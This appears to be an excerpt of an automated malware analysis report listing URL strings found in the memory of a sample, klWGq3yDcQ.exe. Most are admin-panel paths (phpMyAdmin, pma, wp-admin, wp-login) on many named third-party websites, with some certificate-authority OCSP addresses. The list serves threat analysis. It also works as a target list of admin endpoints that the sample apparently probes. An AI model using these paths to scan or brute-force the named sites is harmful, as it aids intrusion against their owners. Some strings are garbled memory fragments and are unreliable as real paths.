Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lumaruniformes.com/administrator/index.phpotrust
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lumaruniformes.com/administrator/index.phprh
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lumaruniformes.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lumaruniformes.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lumaruniformes.com/phpmyadmin/D
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lumaruniformes.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/PhpMyAdmin/it.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/et?
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/phpMyAdmin/ustin.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/phpmyadmin/Admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lwindowelive.com/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macisis.co.uk/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macisis.co.uk/PhpMyAdmin/Admin/tea.edu
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macisis.co.uk/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macisis.co.uk/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macisis.co.uk/phpmyadmin/admin/view.ac
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maxiv.lu.se/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maxiv.lu.se/co:990m
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mdystudent.net/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004380000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-admin/css/forms.min.css?ver=6.1.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-admin/css/l10n.min.css?ver=6.1.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-admin/css/login.min.css?ver=6.1.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-admin/js/password-strength-meter.min.js?ver=6.1.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-admin/js/user-profile.min.js?ver=6.1.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-content/plugins/jetpack/css/A.jetpack.css
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-includes/css/A.buttons.min.css
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-includes/css/A.dashicons.min.css
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-includes/js/dist/vendor
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-includes/js/jquery/jquery-migrate.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-includes/js/jquery/jquery.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-includes/js/underscore.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-includes/js/zxcvbn-async.min.js?ver=1.0
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-login.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micro-design.com/wp-login.php?action=lostpassword
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midcapfunding.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midcapfunding.com/PhpMyAdmin/f
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midcapfunding.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midcapfunding.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midcapfunding.com/phpmyadmin/yAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midcapfunding.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midcapfunding.com/pma/#
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mnit.uc.in/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mnit.uc.in/administrator/index.phpO
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mnit.uc.in/administrator/index.phpk
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/O
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/phpMyAdmin/5
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/phpmyadmin/-
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://my.calvary.qld.edu.au/pma/Admin/-
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nohonetworks.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nohonetworks.com/PhpMyAdmin/1
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nohonetworks.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nohonetworks.com/phpMyAdmin/e
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nohonetworks.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nyklawfirm.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2877970062.00000000036EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.comer
Source: klWGq3yDcQ.exe, 00000001.00000002.2874889633.0000000002DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.coms
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FC9000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0=
Source: klWGq3yDcQ.exe, 00000001.00000002.2888005557.000000000487E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0Q
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsrsaovsslca20180V
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2888110543.0000000004A1D000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0=
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.comS
Source: klWGq3yDcQ.exe, 00000001.00000002.2868964891.0000000002A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887027217.00000000042A7000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocspx.digicert.com0E
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://octetpowers.in/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://octetpowers.in/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://octetpowers.in/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://octetpowers.in/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://octetpowers.in/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://octetpowers.in/pma/D
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ondania.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ondania.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ondania.com/PhpMyAdmin/y
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ondania.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ondania.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ondania.com/phpmyadmin/B
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ondania.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ondania.com/pma/admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paintd.plus.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paintd.plus.com/3tf
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paintd.plus.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paintd.plus.com/PhpMyAdmin/V%
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paintd.plus.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paintd.plus.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paintd.plus.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paintd.plus.com/pma/l
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prettypollycleaning.ae/admin
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prettypollycleaning.ae/adminmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prettypollycleaning.ae/adminmin/eN9
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/PhpMyAdmin/.
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/es.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/phpMyAdmin/0
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/phpmyadmin/)
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000408A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://privatemoe.ae/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2877970062.00000000036E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887588320.0000000004405000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0-
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0X
Source: klWGq3yDcQ.exe, 00000001.00000002.2877970062.00000000036E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/4.0
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/lvz.
Source: klWGq3yDcQ.exe, 00000001.00000002.2887588320.0000000004405000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FC9000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B58000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rdelealtad.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rdelealtad.com/90
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rdelealtad.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rdelealtad.com/PhpMyAdmin/n/dmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rdelealtad.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rdelealtad.com/phpMyAdmin//Admin/Dy
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rdelealtad.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rechagricola.com.br/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rechagricola.com.br/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rechagricola.com.br/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rochester-gauges.be/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rochester-gauges.be/admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rochester-gauges.be/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rochester-gauges.be/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rochester-gauges.be/phpmyadmin/)~
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://samson.pe/wp-content/plugins/carousel-block/dist/assets/vendor/slick/slick.min.css?ver=169951
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://samson.pe/wp-content/plugins/carousel-block/dist/blocks.style.build.css?ver=1699519196
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://samson.pe/wp-includes/css/dist/block-library/style.min.css?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.000000000436A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schema.org
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/PhpMyAdmin/v8
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/ac.in
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sofia-communications.com/phpMyAdmin/
